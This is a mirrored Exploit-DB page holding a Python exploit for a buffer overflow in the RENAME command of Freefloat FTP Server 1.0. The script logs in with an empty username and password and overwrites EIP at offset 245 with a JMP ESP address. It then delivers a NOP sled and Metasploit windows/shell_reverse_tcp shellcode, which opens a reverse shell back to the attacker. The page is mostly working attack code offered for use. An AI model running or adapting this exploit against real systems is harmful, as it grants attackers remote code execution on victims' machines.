Freefloat FTP Server 1.0 – ‘RENAME’ Remote Buffer Overflow

  • 作者: Eagleblack
    日期: 2016-11-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/40677/
  • #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    
    # Exploit Title:FreeFloat FTP Server RENAME Command Buffer Overflow Exploit
    # Date: 29/10/2016
    # Exploit Author: Eagleblack
    # Software Link:http://www.freefloat.com/software/freefloatftpserver.zip
    # Version:1.00
    # Tested on:Windows XP Profesional SP3 Spanish version x86
    # CVE : N/A
    
    #Description: FreeFloat FTP server allow login as root without a user and password, this vulnerability allow to an attacker login and send a 
    # longchain of characters that overflow the buffer, when the attacker knows the exact number that overwritten the EIP registry
    #		he can take possession of the application and send a malicious code (payload) to the ESP stack pointer that allow obtain
    #		a remote code execution on the system that is running the FTP Server, in this case Windows XP.
    
    import socket 
    ret = "\x5B\x96\xDC\x77" #ADVAPI32.dll this dll have a jump to ESP stack pointer
    
    #Metasploit shellcode: 
    #msfvenom -p windows/shell_reverse_tcp LHOST='IP address Local host' LPORT='' -b '\x00\x0a\x0d' -f c
    
    shellcode = ("\xd9\xe5\xba\x7e\xd1\x2c\x95\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
    "\x52\x31\x50\x17\x83\xe8\xfc\x03\x2e\xc2\xce\x60\x32\x0c\x8c"
    "\x8b\xca\xcd\xf1\x02\x2f\xfc\x31\x70\x24\xaf\x81\xf2\x68\x5c"
    "\x69\x56\x98\xd7\x1f\x7f\xaf\x50\x95\x59\x9e\x61\x86\x9a\x81"
    "\xe1\xd5\xce\x61\xdb\x15\x03\x60\x1c\x4b\xee\x30\xf5\x07\x5d"
    "\xa4\x72\x5d\x5e\x4f\xc8\x73\xe6\xac\x99\x72\xc7\x63\x91\x2c"
    "\xc7\x82\x76\x45\x4e\x9c\x9b\x60\x18\x17\x6f\x1e\x9b\xf1\xa1"
    "\xdf\x30\x3c\x0e\x12\x48\x79\xa9\xcd\x3f\x73\xc9\x70\x38\x40"
    "\xb3\xae\xcd\x52\x13\x24\x75\xbe\xa5\xe9\xe0\x35\xa9\x46\x66"
    "\x11\xae\x59\xab\x2a\xca\xd2\x4a\xfc\x5a\xa0\x68\xd8\x07\x72"
    "\x10\x79\xe2\xd5\x2d\x99\x4d\x89\x8b\xd2\x60\xde\xa1\xb9\xec"
    "\x13\x88\x41\xed\x3b\x9b\x32\xdf\xe4\x37\xdc\x53\x6c\x9e\x1b"
    "\x93\x47\x66\xb3\x6a\x68\x97\x9a\xa8\x3c\xc7\xb4\x19\x3d\x8c"
    "\x44\xa5\xe8\x03\x14\x09\x43\xe4\xc4\xe9\x33\x8c\x0e\xe6\x6c"
    "\xac\x31\x2c\x05\x47\xc8\xa7\xea\x30\xd3\x30\x83\x42\xd3\x3f"
    "\xe8\xca\x35\x55\x1e\x9b\xee\xc2\x87\x86\x64\x72\x47\x1d\x01"
    "\xb4\xc3\x92\xf6\x7b\x24\xde\xe4\xec\xc4\x95\x56\xba\xdb\x03"
    "\xfe\x20\x49\xc8\xfe\x2f\x72\x47\xa9\x78\x44\x9e\x3f\x95\xff"
    "\x08\x5d\x64\x99\x73\xe5\xb3\x5a\x7d\xe4\x36\xe6\x59\xf6\x8e"
    "\xe7\xe5\xa2\x5e\xbe\xb3\x1c\x19\x68\x72\xf6\xf3\xc7\xdc\x9e"
    "\x82\x2b\xdf\xd8\x8a\x61\xa9\x04\x3a\xdc\xec\x3b\xf3\x88\xf8"
    "\x44\xe9\x28\x06\x9f\xa9\x59\x4d\xbd\x98\xf1\x08\x54\x99\x9f"
    "\xaa\x83\xde\x99\x28\x21\x9f\x5d\x30\x40\x9a\x1a\xf6\xb9\xd6"
    "\x33\x93\xbd\x45\x33\xb6") 
    
    buffer ='\x41'* 245 + ret + '\x90'* 30 + shellcode #EIP overwritten at offset 245
    print "Sending Buffer"
    
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #open socket
    connect = s.connect(('192.168.1.13',21))#IP address and port (21) from the target
    s.recv(1024)#FTPBanner
    s.send('USER \r\n') #Sending USER (Null user)
    s.recv(1024) 
    s.send('PASS \r\n') #Sending Password (Null password)
    s.recv(1024)
    s.send('RENAME' + buffer +'\r\n')
    s.close()